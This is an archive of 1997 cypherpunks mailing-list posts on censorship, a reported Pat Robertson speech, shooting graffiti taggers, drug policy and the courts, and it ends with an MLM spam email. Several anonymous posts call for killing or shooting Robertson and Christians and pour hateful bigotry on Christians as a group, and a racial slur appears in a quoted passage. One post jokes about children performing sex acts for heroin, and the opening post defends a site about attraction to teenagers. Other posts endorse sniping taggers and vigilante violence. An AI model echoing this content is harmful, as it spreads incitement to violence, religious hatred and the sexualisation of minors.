 > Jim Tradwick, a San Antonio, Texas businessman, can testify
 > to the tactics of vigilante censors. Tradwick runs XtatiX,
 > a small Texas based company offering Web space to
 > individuals and companies. In June he found himself on the
 > receiving end of hate e-mails and harassing phone calls.
 > The U.S. Customs threatened to confiscate his computer
 > systems for investigation, and the San Antonio police
 > threatened to take away his young son.

What's really amazing is how much under the table support the
anti-civil liberties agenda gets from LEAs and agencies of the
Federal Government.  With Civil Forfeiture laws reversing the
concept of "innocent until proven guilty," and helpful government
agencies attempting to apply pressure to suspected "Thought
Criminals," it becomes very difficult for the typical business
owner to avoid capitulating to these folks.

 > Had Tradwick been caught dabbling with child pornography?
 > Or had he perhaps allowed his systems to be used by a
 > pedophile ring? Twice no. His only "crime", that so
 > infuriated CPAC, was to host a gay site called "Free
 > Spirits" (http://www.ivan.net/fs) abou t attraction to
 > teenagers, which included articles written by gay teens
 > themselves.

 > But Cox, along with her ally--a retired police officer
 > called Mike Paladino obsessed with sexual perversion--and
 > his contingent of jackbooted thugs, decreeded that Free
 > Spirits was beyond the pale. And thus Tradwick found himself
 > on the receiving end of harassment, hate mail, and even
 > death threats against his son.

Paladino isn't just a retired police officer, he is a retired
Police Captain!  We're talking management here. He doesn't just
wield the ol' "Assault Plunger," he's part of the design team. :)

 > I made an effort to build bridges between myself and CPAC
 > by posting what I hoped would be considered reasoned and
 > reasonable debate on their discussion board. However, even
 > that was too much, as my access to their forum was
 > restricted to read-only. I can only conclude that Cox didn't
 > want reason to interfere with the prevailing views
 > expressed in the forum.

Har!  The only rhetorical weapon the Lovely and Talented Ms. Cox
needs in her forum is the Delete Key.

 > So I am circulating, via Usenet, blind e-mail, and BoyChat,
 > the text of the message I attempted to post to CPAC's forum
 > under my BoyChat and IRC nickname Rob Walker. I welcome
 > anyone from CPAC to discuss the points herein, anywhere
 > they like. I know poste rs to the CPAC forum occasionally
 > monitor BoyChat, and Usenet groups such as alt.censorship
 > and others. Unlike other boards, BoyChat does not censor
 > messages whose sentiment its Webmaster does not agree with.

Well, that's very nice, but I think this is a task tantamount to
trying to convert the Ayatollah Khomeni to Episcopalianism

But I wish you the best of luck in your quest.

[CPAC-Censored Social Science Essay Expunged]

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     enoch at zipcon.com   $    via Finger                       $
         {Free Cypherpunk Political Prisoner Jim Bell}







From anon at anon.efga.org  Fri Aug 22 19:08:22 1997
From: anon at anon.efga.org (Anonymous)
Date: Sat, 23 Aug 1997 10:08:22 +0800
Subject: None
Message-ID: 



At 05:33 PM 8/22/97 -0400, you wrote:
>>  Great Barrington, MA -- In a recent
>>  pronouncement, television evangelist and
>>  head of the Christian Coalition, Pat
>>  Robertson, advocated death by stoning for
>>  crypto enthusiasts.

Figures.

I've never understood this dumb Christian overlooking of how the world
actually functions.  You don't "stone" people to death anymore,
there's other ways to kill them.  Second, this "Pat Robertson" is a
fascist.

>>  Robertson used the news of the July 25th
>>  Senate Commerce Committee hearing to promote
>>  his extreme beliefs. A segment on the July 27,
>>  1997 broadcast of The 700 Club featured news
>>  of the Senate hearing. Employing the
>>  historical event as a starting point, the
>>  program delved into the possibility of the
>>  existence of anonymous free speech on the
>>  Internet.

Something that should be spread, rather than destroyed, but narrow
minded Christians don't seem to get that.

>>  While Robertson viewed the Internet with
>>  suspicion, on a more serious note, he
>>  launched into a diatribe against those who
>>  entertain the existence of uninhibited free
>>  speech on the Internet. He said, in a
>>  rambling discourse, that if such a thing
>>  existed, it would simply create demons that
>>  would lead people away from Christ.

Lead them away from opression, to freedom.  According to this guy, the
people who helped stike down the CDA are devils.

Also, this clearly shows that this man is a Nazi.

>>  According to Robertson, the threat is so
>>  serious that people who believe in free
>>  speech should be put to death by stoning --
>>  according to "God's word."

Fuck him.  God's word is fascism, hate, narrow-mindedness, and a Big
Brother State.  He can take his bible and shove it up his ass.

>>  "The Bible says the Earth belongs to man,
>>  but the Word belongs to the Lord,"
>>  Robertson said.

Sorry, we own earth, and God doesn't exist.

>>  "He has given us the Earth. He also warned 
>>  us in the book of Matthew of the dangers of
>>  corrupting forces such as the Internet which
>>  can be used for evildoers:

First of all, this also proves Christians are incabable of making real
world arguments, because they rely so heavily on a 1000-page book
filled with lies.

>>  "'A good tree cannot bear bad fruit, nor can
>>  a bad tree bear good fruit. Every tree that
>>  does not bear good fruit is cut down and 
>>  thrown into the fire. Therefore, by their
>>  fruits you will know them. (Matthew 7:17-20)'

I'm not going to bother with cryptic messages sent by a god-loving
Nazi.

>>  "And you see, there is only one Word, and
>>  that is the Word of God:

Bullshit.

>>  "'In the beginning was the Word, and the Word
>>  was with God, and the Word was God. (John 1:1)'"
>>  'For the Word of the Lord is right; and all his
>>  works are done with faithfulness. He loveth
>>  mercy and judgment: the earth is full of the
>>  mercy of the Lord. (Psalm 32:4-5)'

Mercy?  How merciful is commiting mass-murder because humans don't fit
your bill, god?

Second off, cryptic responses aren't worth a shit in arguments.

The word of the lord is fascism.

>>  "Can a demon appear as a slanty-eyed,
>>  funny-looking computer hacker?

No, but I see them all the time in tghe form of men wearing robes with
crosses on them, reading from a 1000-page book of lies.

>>  Of course
>>  he can, or it can. Of course they can deceive
>>  people. And if they can lead somebody away
>>  from the true God, or away from Jesus
>>  Christ, anyway it happens, it doesn't
>>  matter, you will lose your salvation. It
>>  doesn't matter how they get you. The
>>  question is, did they get you, and under
>>  what guise?

As i said, they don't lure you away from god, they open your eyes, and
you grow up and stop the nonsense.

>>  "This is man in rebellion against God, who
>>  refuses to take God's Law. And God says,
>>  'My covenant says you won't do this. And if
>>  I find anybody in Israel,'-- "which is his
>>  pure nation" -- 'If I find anybody in
>>  Israel that's doing this sort of thing,
>>  then I want you to take him out and dispose
>>  of him."

That is fascism.  Nazi fascism.

>>  "It's a clear violation of God's word.
>>  Stone them."

That's a clear violation of my rights, shoot that Christian prick.

>>  Skipp Porteous, Freedom Writer publisher,
>>  commented: "As the founder and chairman of
>>  the Christian Coalition -- a group
>>  dedicated to becoming the most powerful
>>  political force in America -- Robertson's
>>  extreme ideas need to be taken seriously,
>>  for they not only negate pluralism, but
>>  condemn to death those who dare to believe
>>  differently."

Which is fascism.  Nazi fascism.  This loser makes Communism sound
good, considering it outlaws religion.

This post has moved me considerably.  Some parts of his speech
requires a response that words could not adequately describe.

This speech of his outlines in entirety the Christian Agenda. 
Enslaving, murder of those different, intolerance, fascism.

If Christians try to stone anyone, they should be shot right away.

Freedom-Thru-AtheismMonger
"Your god is DEAD!!! And no one cares!!! If there is a hell, I'll see
you there!!!!!" - Nine Inch Nails, "Heresy"






From gbroiles at c2.net  Fri Aug 22 19:36:56 1997
From: gbroiles at c2.net (Greg Broiles)
Date: Sat, 23 Aug 1997 10:36:56 +0800
Subject: Breaking Legal News.... (fwd)
In-Reply-To: 
Message-ID: <3.0.3.32.19970822191804.00a3ad10@208.139.36.80>



>The American legal system has spun out of control. I don't argue that she
>should not have the right to sue...everybody does. But a judge can quickly
>dismiss a case on a matter of law.

According to the Mercury-News, the suit has been dismissed.




--
Greg Broiles
gbroiles at c2.net
510-986-8770 x 309 voice ** please note phone number has changed **
510-986-8777 fax






From JonWienk at ix.netcom.com  Fri Aug 22 20:22:13 1997
From: JonWienk at ix.netcom.com (Jonathan Wienke)
Date: Sat, 23 Aug 1997 11:22:13 +0800
Subject: Shooting the taggers
In-Reply-To: <199708222214.PAA07946@f50.hotmail.com>
Message-ID: <3.0.2.32.19970822200207.006dc538@popd.netcruiser>

At 03:14 PM 8/22/97 PDT, John Smith wrote:
>
>No, the idea is that the taggers do their thing in order to see
>the results of their work on display.  Paint over the results
>promptly, and there is no point to tagging.
>
>>There's a solution for taggers: snipers.
>
>A punishment far out of proportion to the crime.
>
>It is a mistake to think that all crimes should be punished by the
>most violent means possible.  Notice that most proponents have
>never raised children.  They need to learn the importance of
>proportionality.
>
>"John
>
>______________________________________________________
>Get Your Private, Free Email at http://www.hotmail.com
>

Speaking as a father and as someone who has been followed by gang members
on numerous occasions after witnessing a gang assault and providing
information to the police, I am in agreement with Tim May.  I don't want my
child to be corrupted or assaulted by worthless, predatory scum.  There
would be much less gang crime if private citizens could cane or otherwise
deal with gangsters when they caught them in the act, pour encourager les
autres, like.

Jonathan Wienke

What part of "the right of the people to keep and bear Arms, shall not be
infringed" is too hard to understand? (From 2nd Amendment, U.S. Constitution)

When everyone is armed, criminals fear everyone, not just the police.

PGP 2.6.2 RSA Key Fingerprint: 7484 2FB7 7588 ACD1  3A8F 778A 7407 2928
DSS/D-H Key Fingerprint: 3312 6597 8258 9A9E D9FA  4878 C245 D245 EAA7 0DCC
Public keys available at pgpkeys.mit.edu. PGP encrypted e-mail preferred.

US/Canadian Windows 95/NT or Mac users:
Get Eudora Light + PGP 5.0 for free at http://www.eudora.com/eudoralight/
Get PGP 5.0 for free at http://bs.mit.edu:8001/pgp-form.html
Commercial version of PGP 5.0 and related products at http://www.pgp.com
Eudora + PGP = Free, Convenient Communication Privacy
-------------- next part --------------
A non-text attachment was scrubbed...
Name: pgp00003.pgp
Type: application/octet-stream
Size: 237 bytes
Desc: "PGP signature"
URL: 

From frantz at netcom.com  Fri Aug 22 20:26:14 1997
From: frantz at netcom.com (Bill Frantz)
Date: Sat, 23 Aug 1997 11:26:14 +0800
Subject: Welfare Solution #389
In-Reply-To: <3.0.3.32.19970822025549.006f3d6c@pop.mhv.net>
Message-ID: 



At 7:47 AM -0700 8/22/97, Alex Le Heux wrote:
>I Switserland they've gone even further now, and started supplying hardcore
>herion addicts with free heroin. The results were quite dramatic. Most of the
>addicts gave up stealing/etc and some even managed to get and hold a normal
>job. As it turned out, supplying them with free heroin was much cheaper than
>having them hang around and steal/rob/etc. It also served to reduce the call
>for extra police, and the call by the police for more rights/weapons/etc.

The Swiss friends we visited earlier this week agree that this policy has
had positive effects.  We passed a park in Zurich that had formally been
used by heroin addicts as a "shooting gallery", and was now being used by
ordinary citizens including families with small children.  They mentioned
the change in the park as one of the benefits of the new policy.


-------------------------------------------------------------------------
Bill Frantz       | The Internet was designed  | Periwinkle -- Consulting
(408)356-8506     | to protect the free world  | 16345 Englewood Ave.
frantz at netcom.com | from hostile governments.  | Los Gatos, CA 95032, USA







From dformosa at st.nepean.uws.edu.au  Fri Aug 22 20:27:04 1997
From: dformosa at st.nepean.uws.edu.au (? the Platypus {aka David Formosa})
Date: Sat, 23 Aug 1997 11:27:04 +0800
Subject: heart
In-Reply-To: 
Message-ID: 



-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 22 Aug 1997, Ray Arachelian wrote:

> On Fri, 22 Aug 1997, ? the platypus {aka David Formosa} wrote:
> 
> > Humans do some realy rotten things but that is just the nature of a
> > creature with free will.
> 
> And somehow this justifies their actions while allowing them to be human,
> and doesn't justify our hatred of them and makes us inhuman? 

If we are willing to consider anyone of us to be less then human then we
all become less human.  No one has a right to consider anthoughter less
then human.

[...]

> > Again I would not wish to live like that Nor do I beleave that it is true
> > justice (what ever that may be.).  Its a barbric form of psydojusice.
> 
> It's called having the punishment fit the crime precisely and exactly.

I would prefur that the punishment would fit the criminal.


> > [...] At some point someone is going to say "To protect your privacy
> > we have to violate your privacy."
> 
> That would be Hoover.  Correct: corruption.  And why have we accepted and
> allowed such corruption of ideals from the start?

It is greaduil,  first you let the cops beconsidered less then human and
then you let the idear spread to other groups.  The only fair way to
defend against such attacks is to attack idears like that when ever thay
occour.

[...]

> Erm, when the jack booted thugs come at you with automatics, I'd like to
> see you throw PGP disks, or source code at them to see if it can do more
> damage to them that their bullets to your body.

Raids from jack booted thugs are nether the start nor the end.  While code
will not stop bullets, thay sometimes will have the ablity to stop the
thugs being able to get you.

[...]

> > Its just I fear the cure where worce then the desease.
> 
> The cure happened once before.  Recall England and the lovely colonies
> that rebelled.  Do you believe that cure was worse than the Kings taxes
> and troops?

Given I am a subject of HRM[1] I would not know.  I am not happy about
this eather but we are working at getting rid of her.  

- -- 
Please excuse my spelling as I suffer from agraphia see the url in my header. 
Never trust a country with more peaple then sheep.  ex-net.scum and proud
You Say To People "Throw Off Your Chains" And They Make New Chains For
Themselves? --Terry Pratchett

[1] I am an Australian.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAwUBM/4ZTaQK0ynCmdStAQEWAQQAqhBy5SkbJnYvtz7VCxlcnR9Mk/fDur4z
nbnxeEyZtE5nNRuD+cXfwcomAdQUv8knZULHr6KoVahxr0B9FIwrAJi19O9Z3C83
9T9gw8F67/dArmMcrwvj91wPMwR1OmiUAulsl7WMPXklt8HwgKRL91y5NlZBbKbE
pwb+EORA6gU=
=EAOS
-----END PGP SIGNATURE-----






From nobody at REPLAY.COM  Fri Aug 22 20:34:24 1997
From: nobody at REPLAY.COM (Anonymous)
Date: Sat, 23 Aug 1997 11:34:24 +0800
Subject: When did he get traded to the Black Hawks?
Message-ID: <199708230320.FAA17748@basement.replay.com>



Anonymous wrote:
> At 05:33 PM 8/22/97 -0400, you wrote:
> >>  Great Barrington, MA -- In a recent
> >>  pronouncement, television evangelist and
> >>  head of the Christian Coalition, Pat
> >>  Robertson, advocated death by stoning for
> >>  crypto enthusiasts.
 
> I've never understood this dumb Christian overlooking of how the world
> actually functions.  You don't "stone" people to death anymore,
> there's other ways to kill them.  Second, this "Pat Robertson" is a
> fascist.

  I'm a Frisbeetarian. I believe that, when you die, your soul goes up
on the roof, and you can't get it down.
  Nonethemore, I take umbrage at much of the recent Christian-bashing
taking place on the cypherpunks list. Bash Pat Robertson, 'make fun' 
of Jesus, but please, stop painting with the wide brush. If I claim 
to speak for the cypherpunks, then I would expect to be roundly booed
and set upon by Mongers with long teeth and shot at by whoever May
choose to do so. I expect the same for Pat Robertson when he speaks
for Jesus. He's an asshole!
  However, the cypherpunks mailing list serves a purpose for giving
us a forum to discuss and debate issues that are important to us, and
the Christian faith does likewise for those who think evolution is
a Satanist plot, and Jesus plays goalie for the Chicago Blackhawks.
(Jesus Saves! {But Gretsky puts in the rebounds.})

> >>  While Robertson viewed the Internet with
> >>  suspicion, on a more serious note, he
> >>  launched into a diatribe against those who
> >>  entertain the existence of uninhibited free
> >>  speech on the Internet.

  Uuuhhh...forget what I just said. Let's kill this fucker and
anyone who tunes him in on "the day of the sun."

> >>  According to Robertson, the threat is so
> >>  serious that people who believe in free
> >>  speech should be put to death by stoning --
> >>  according to "God's word."

  This sounds like a misrepresentation of Robertson's beliefs,
by someone who has an axe to grind, but now that I've got the
adrenaline flowing, I don't give a shit. Let's kill him!
 
> Fuck him.  God's word is fascism, hate, narrow-mindedness, and a Big
> Brother State.  He can take his bible and shove it up his ass.

  That costs extra... At least, in the places I frequent, it does.

> Sorry, we own earth, and God doesn't exist.

  If God is Love, and Love is Blind, then Ray Charles must be God.
 
> >>  "He has given us the Earth. He also warned
> >>  us in the book of Matthew of the dangers of
> >>  corrupting forces such as the Internet which
> >>  can be used for evildoers:

  Why do people say things like this, without giving pointers
to the relevant URL's? If I'm going to avoid sinful web sites,
then I need to check them out first, so that I know what I am
avoiding. 
  Being the forgiving type, I would also feel obligated to keep
checking these evil web sites out on a regular basis, to see if
they have repented, yet.
 
> First of all, this also proves Christians are incabable of making real
> world arguments, because they rely so heavily on a 1000-page book
> filled with lies.

  God (pardon the expression), but you have a negative attitude. There
are many valuable things one can learn from studying the Bible.
  e.g.
Q?: Who was the smallest person in the Bible?
A!: The guard who fell asleep on his watch!

Q?: Which stretches further, rubber or skin?
A!: Skin. The Bible tells of a man who tied his ass to a tree, and
    walked over a mountain.
 
> >>  "'A good tree cannot bear bad fruit, nor can
> >>  a bad tree bear good fruit. Every tree that
> >>  does not bear good fruit is cut down and
> >>  thrown into the fire. Therefore, by their
> >>  fruits you will know them. (Matthew 7:17-20)'

  So, if your brother has a boyfriend...

> >>  "And you see, there is only one Word, and
> >>  that is the Word of God:
 
> Bullshit.

  I've been wondering what that word was. "Bullshit..."
  I like that word. Does that make me a Christian?
 
> >>  "'In the beginning was the Word, and the Word
> >>  was with God, and the Word was God. (John 1:1)'"

  Hey! I just typed 'God.'
  'God.' Look! I did it again.
  Watch this... Bullshit!
  I'm starting to like this Christian religion thing.

> Second off, cryptic responses aren't worth a shit in arguments.

  That's because you don't take the time to understand them.
  Remember, "Patience comes to those who wait."
 
> >>  "Can a demon appear as a slanty-eyed,
> >>  funny-looking computer hacker?

  Well, I've never actually *met* Bill Gates, but...
 
> >>  Of course
> >>  he can, or it can. Of course they can deceive
> >>  people. And if they can lead somebody away
> >>  from the true God, or away from Jesus
> >>  Christ, anyway it happens, it doesn't
> >>  matter, you will lose your salvation. It
> >>  doesn't matter how they get you. The
> >>  question is, did they get you, and under
> >>  what guise?

  Well, you have to consider the Support package before you really
pass judgement. What kind of Jock strap are we talking about, here?
 
> >>  "This is man in rebellion against God, who
> >>  refuses to take God's Law. And God says,
> >>  'My covenant says you won't do this. And if
> >>  I find anybody in Israel,'-- "which is his
> >>  pure nation" -- 'If I find anybody in
> >>  Israel that's doing this sort of thing,
> >>  then I want you to take him out and dispose
> >>  of him."
> 
> That is fascism.  Nazi fascism.

  Come on, you're overreacting. Everything is disposable these days. 

> >>  "It's a clear violation of God's word.
> >>  Stone them."

  "Everybody must get stoned." - Bob Dylan

> >>  Skipp Porteous, Freedom Writer publisher,
> >>  commented: "As the founder and chairman of
> >>  the Christian Coalition -- a group
> >>  dedicated to becoming the most powerful
> >>  political force in America -- Robertson's
> >>  extreme ideas need to be taken seriously,
> >>  for they not only negate pluralism, but
> >>  condemn to death those who dare to believe
> >>  differently."

  How differently does one have to believe to just get "spanked?"
(I'm not into hard-core.)
 
> This speech of his outlines in entirety the Christian Agenda.
> Enslaving, murder of those different, intolerance, fascism.

  Jesus! (pardon the expression)
  Do these people put out a magazine? Color glossies? Is there
bondage involved? If so, I would be willing to convert.

 > If Christians try to stone anyone, they should be shot right away.

  Not if they pick out the seeds and stems, first.
 
> Freedom-Thru-AtheismMonger
> "Your god is DEAD!!! And no one cares!!! If there is a hell, I'll see
> you there!!!!!" - Nine Inch Nails, "Heresy"

  I bought a futures contract on "Nine Inch Nails." If they are not
"Eleven Inch Nails" by this time next week, I lose my ass.

  I know this post doesn't make much sense, but it's Friday night and
I haven't got a date. Is anybody out there getting laid tonight? Could
you send me pictures?
  I'm desperate. The posts to alt.boring have slowed to a crawl. I'm
running out of Pop Tarts. Still no word from the Reader's Digest 
Sweepstakes.

  And the way this relates to cryptography is...
  ...uuuhhh...John Gilmore is a cocksucker!

(Bet you thought this whole damn post was going to be off-topic,
 didn't you?)






From nobody at REPLAY.COM  Fri Aug 22 20:39:23 1997
From: nobody at REPLAY.COM (Anonymous)
Date: Sat, 23 Aug 1997 11:39:23 +0800
Subject: None
Message-ID: <199708230328.FAA18726@basement.replay.com>



anon at anon.efga.org wrote:

 >>  Great Barrington, MA -- In a recent
 >>  pronouncement, television evangelist and
 >>  head of the Christian Coalition, Pat
 >>  Robertson, advocated death by stoning for
 >>  crypto enthusiasts.

 AN> This post has moved me considerably.  Some parts of his speech
 AN> requires a response that words could not adequately describe.


Jim Bell has a solution for that 

BellMonger







From anon at anon.efga.org  Fri Aug 22 21:05:06 1997
From: anon at anon.efga.org (Anonymous)
Date: Sat, 23 Aug 1997 12:05:06 +0800
Subject: Welfare Solution #389
Message-ID: 



Bill Frantz wrote:

> The Swiss friends we visited earlier this week agree that this policy has
> had positive effects.  We passed a park in Zurich that had formally been
> used by heroin addicts as a "shooting gallery", and was now being used by
> ordinary citizens including families with small children.  They mentioned
> the change in the park as one of the benefits of the new policy.

  Yeah, the kids no longer have to pay "mall prices" for their heroin.
Let's be *real* here--it means the kids are giving some pervert a blow
job for fifty cents worth of heroin, instead of for twenty dollars worth
of heroin.
  Boy, just talking about this makes me miss my Uncle Jim.







From jsmith58 at hotmail.com  Fri Aug 22 22:23:00 1997
From: jsmith58 at hotmail.com (John Smith)
Date: Sat, 23 Aug 1997 13:23:00 +0800
Subject: Shooting the taggers
Message-ID: <19970823051427.7115.qmail@hotmail.com>



>>>There's a solution for taggers: snipers.

>From: Jonathan Wienke 

>Speaking as a father and as someone who has been followed by gang 
members
>on numerous occasions after witnessing a gang assault and providing
>information to the police, I am in agreement with Tim May.


You agree that the solution for taggers is snipers?  You agree that
children who paint graffiti should be shot, perhaps killed?


>I don't want my
>child to be corrupted or assaulted by worthless, predatory scum.  There
>would be much less gang crime if private citizens could cane or 
otherwise
>deal with gangsters when they caught them in the act, pour encourager 
les
>autres, like.

Your own child gets a ride home with a crowd of high-spirited
troublemakers, and on the way home they bash in J. Cypherpunk's
mailbox with a baseball bat.  JC appears on his porch and rakes
the car with his AK-47, killing all on board.  Is this justified?

"John

______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com






From stewarts at ix.netcom.com  Fri Aug 22 22:23:04 1997
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Sat, 23 Aug 1997 13:23:04 +0800
Subject: an end to "courts" (was RE: An end to "court appointed attorneys" )
In-Reply-To: <01BCAE9E.55579440@d414.pppdel.vsnl.net.in>
Message-ID: <3.0.2.32.19970822113422.02f64048@popd.ix.netcom.com>



In most kinds of welfare, the state is pretending to "help" the recipient
by protecting them against the real world, whether it's the difficulties
of finding food, medical care, or whatever; it's a job that really 
belongs to private charity, though arguably government may provide
more help by inefficiently spending large amounts of theft-funded money
vs. efficiently spending smaller amounts of voluntary money and labor.

Public defenders are a different case, however - the attacks the
government is protecting the recipient against are attacks by the
government itself, and the cost of hiring a lawyer to defend him against
the government may be as severe a punishment as the offence in question.
OJ may have been able to outspend the prosecution in an attempt to
obtain justice or evade it, but you can't.

Court-funded attorneys are obviously in a conflict of interest, 
even in non-political crimes, and the government isn't overly 
enthusiastic about funding them well, and they're usually not as good 
as the ACLU would be, but on the other hand they _will_ often 
provide some help for cases the ACLU doesn't bother with.
How much they're there to really help, and how much their purpose is
to let the government pretend it's being fair, is a toss-up.
But the average citizen, who doesn't deal with the court end of
government every day or every year, has a minimal chance of justice
without competent legal assistance, or without spending more time
than the average prosecution cycle learning how the courts work.


>Prosecution: "The DNA results showed a match to an average of two out of
>the earth's 7 billion inhabitants. Mr. Simpson's DNA was one of them. "
>Defense: "So how come you ain't lookin' for da other guy?"
>Jurors: "Like Johnnie said, if it do not fit, you must acquit."

Well, Johnnie was right about that.  The police had decided (probably
correctly) that OJ was the most likely murderer, and had set out to
convict him, doing it sloppily and in ways that tainted the evidence.
Bad lab procedures, which were apparently a problem, made it possible
to mix up samples (even if they weren't doing it deliberately),
as well as to interpret the tests in the most pro-conviction way.
And because the police were quite public about their accusations,
they were under pressure to get the conviction, by any means necessary. 

One of the important principles of American justice, such as it is,
is that people are supposed to be innocent unless they're really
proven guilty, beyond reasonable doubt, and that it's better to
fail to convict an occasional guilty person than to convict an
innocent person - especially when the penalty may be death.
The police botched their case terribly, and they deserved to lose.
The jury did the right thing in not accepting it.
On the other hand, the civil jury that stuck it to OJ financially
also did the right thing; there _was_ a lot of evidence that he did it,
to the level of proof required for a civil case.

>OJ Simpson could have received a trial beginning 60 days after the 
>murders, lasting for no more than 10 days, and with his execution to 
>follow within 30 days after that. (Yes, I would allow one "appeal," 
>with a higher court listening to any objections to how the lower court
>operated, etc., and possibly ordering a new trial, etc. It should not 
>take more than a day or two.)

Especially for politically sensitive cases, but sometimes in simple ones,
police often jump to conclusions, and hide or ignore evidence that
would exonerate the accused, and courts usually buy there stories;
in spite of that, we keep seeing people ################
>
>The adversarial machine is made worse by the vast public subsidies of both
>sides, the endless delays, and the general "legalisms" used by both sides.
>
>As a personal note, my father was an officer in the U.S. Navy, and served
>on several courts martial. No capital murder cases, that I recall him
>mentioning, but some might serious matters. As most of you must know, the
>system is much different than the main U.S. legal system. And my father
>believes the military system is vastly more just, and quicker, and cheaper.
>A 3-man panel hears the evidence presented, asks questions, listens to
>defense points, etc., and then adjourns to reach a verdict. All in a few
>days, of course.
>
>No jury consultants making sure that no college graduates are on the jury,
>that enough blacks are seated, that facial expressions indicate likely
>sympathies to the defendant, etc.
>
>The U.S. system is corrupt. Hordes of lawyers--too many, of course--swarm
>out into the "System," inflating legal bills, billing at $200 an hour for
>the Xerox copying time of junior lawyers, and even charging lavish lunches
>to the other side. (I could cite dozens of examples...)
>
>Those of you who have taken McVeigh's "side" against Steven Jones should
>consider this whole situation. McVeigh, who quite clearly "did it," will
>now get a new lawyer--and his team!--to handle the appeal. More delays,
>more time billed at $300 an hour for the new top lawyer, and at $200 x 4 =
>$800 for his major assistants, and at some unknown rate for his clerks,
>secretaries, etc., all for what? So that an additional $500K or so is
>spent, with a delay now of an additional 4 to 6 months "for the new lawyers
>to familiarize themselves with the 200,000 pages of transcripts"...and so
>on.
>
>To what end? McVeigh did it, and only an Alice in Wonderland legalistic
>society could even doubt it for a nanosecond.
>
>(And in fact, we all accept this. Where's the real "outrage" that McVeigh
>is being prosecuted for a crime he didn't commit? We were outraged that
>Randy Weaver was entrapped on such a minor offense (shortening a rifle
>barrel by an inch or two), and that his wife and son were then shot in an
>ambush. We were outraged at Waco. We _are_ outraged at the treatment Abner
>Louima received in NYC. But we are not outraged at McVeigh's treatment.
>Because, as with OJ, anybody with three neurons to rub together knows he
>did it. And yet the multi-year legal charade continues.)
>
>--Tim May
>
>There's something wrong when I'm a felon under an increasing number of laws.
>Only one response to the key grabbers is warranted: "Death to Tyrants!"
>---------:---------:---------:---------:---------:---------:---------:----
>Timothy C. May              | Crypto Anarchy: encryption, digital money,
>tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
>W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
>Higher Power: 2^1398269     | black markets, collapse of governments.
>"National borders aren't even speed bumps on the information superhighway."
>
>
>
>
>
>

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk/pub/crypto/pgp
#   (If this is a mailing list or news, please Cc: me on replies.  Thanks.)






From kent at songbird.com  Fri Aug 22 23:01:51 1997
From: kent at songbird.com (Kent Crispin)
Date: Sat, 23 Aug 1997 14:01:51 +0800
Subject: lack of evolutionary pressures (was Re: An end to "court appointed attorneys")
In-Reply-To: <19970821224859.24682@bywater.songbird.com>
Message-ID: <19970822224234.61793@bywater.songbird.com>



On Sat, Aug 23, 1997 at 12:53:08AM +0100, Adam Back wrote:
> 
> Kent Crispin  writes:
> > On Fri, Aug 22, 1997 at 12:40:29AM +0000, Vipul Ved Prakash wrote:
> > > 
> > > the idea is that the "competent" (not "chosen") are irrevocably different 
> > > from those other "incompetent and parasitical" (and not "unfortunate") 
> > > creatures that accidentally share the same physical form.
> > 
> > And how is it that one knows that one is "competent"?
> 
> One doesn't.  But if one is not competent, one is likely to find out the
> hard way.
> 
> There's precious little evolutionary pressures around at the moment,
> the race could use some more.

The evolutionary definition of "competent" is "propagate your genetic 
material".  A rough corollary is that those who raise the most children 
to child-bearing age are the most competent.  In practice it seems to 
be the case, however, that intelligence and "evolutionary competence" 
are negatively correlated.  As I am sure you are aware, there are all 
kinds of evolutionary strategies...

I think this goes a little deeper, in fact.  The kind of intelligence
that leads to high technical achievement is not even necessarily a
kind of intelligence that favors survival under difficult situations. 
If society dissolves it is my belief that computer geeks, like us, are
not the ones that will be most likely to survive.... 

-- 
Kent Crispin				"No reason to get excited",
kent at songbird.com			the thief he kindly spoke...
PGP fingerprint:   B1 8B 72 ED 55 21 5E 44  61 F4 58 0F 72 10 65 55
http://songbird.com/kent/pgp_key.html






From stewarts at ix.netcom.com  Fri Aug 22 23:25:00 1997
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Sat, 23 Aug 1997 14:25:00 +0800
Subject: Shooting the taggers
In-Reply-To: <199708221538.RAA21396@basement.replay.com>
Message-ID: <3.0.2.32.19970822224510.02f9f084@popd.ix.netcom.com>



At 10:57 AM 8/22/97 -0700, Tim May wrote:
>There's a solution for taggers: snipers.
>(I'm indebted to Chip Morningstar for this succinct solution.)

I'm highly opposed to this inappropriate use of excess force.
Snipers with paint-guns?  Sure.  Snipers with rock-salt guns?  Perhaps.
Snipers with real bullets?  Sorry, it ain't worth murder.

On the other hand, the parallels between graffiti taggers and 
SPAMMERs are fairly direct...


#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk/pub/crypto/pgp
#   (If this is a mailing list or news, please Cc: me on replies.  Thanks.)






From sussexrct at 1stfamily.com  Sat Aug 23 14:40:38 1997
From: sussexrct at 1stfamily.com (sussexrct at 1stfamily.com)
Date: Sat, 23 Aug 1997 14:40:38 -0700 (PDT)
Subject: $ Make Extra Cash $
Message-ID: <199708232140.OAA11511@toad.com>


This message is being brought to you by EMAIL BLASTER 2.5 software.  If you would like a FREE copy of this software or any of our other HOT programs ABSOLTELY FREE call our FAX ON DEMAND number at 213-960-7822.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
$ Make Real Money With your PC $

If your main goal in life is to become RICH, you are not alone !. Thousands 
of people from all over the world that have the same GOAL are working
together to achieve it. Your PC could make you thousands of dollars with the
appropriate software, information and techniques.

Work from home with your PC, distributing software and information all over the
world via E-mail and the Internet

You can make thousands of dollars with our business. It doesn't matter who
you are, what you do or where you live, full time or part time.

The PC-SUPER-MLM program and its products, Info-Reports,  allow you to run
the business from anywhere in the world working with your PC computer.

Our products are INFO-REPORTS that provide valuable information  that helps
you to reach financial independence. Our business is operated completely via
 E-mail, so the operation and distribution cost is zero.

Free Software runs under DOS or Windows. Very easy to use. No special skills
required.  No hassle.

Let me put in your hands at no cost to you, the INFORMATION and TOOLS that
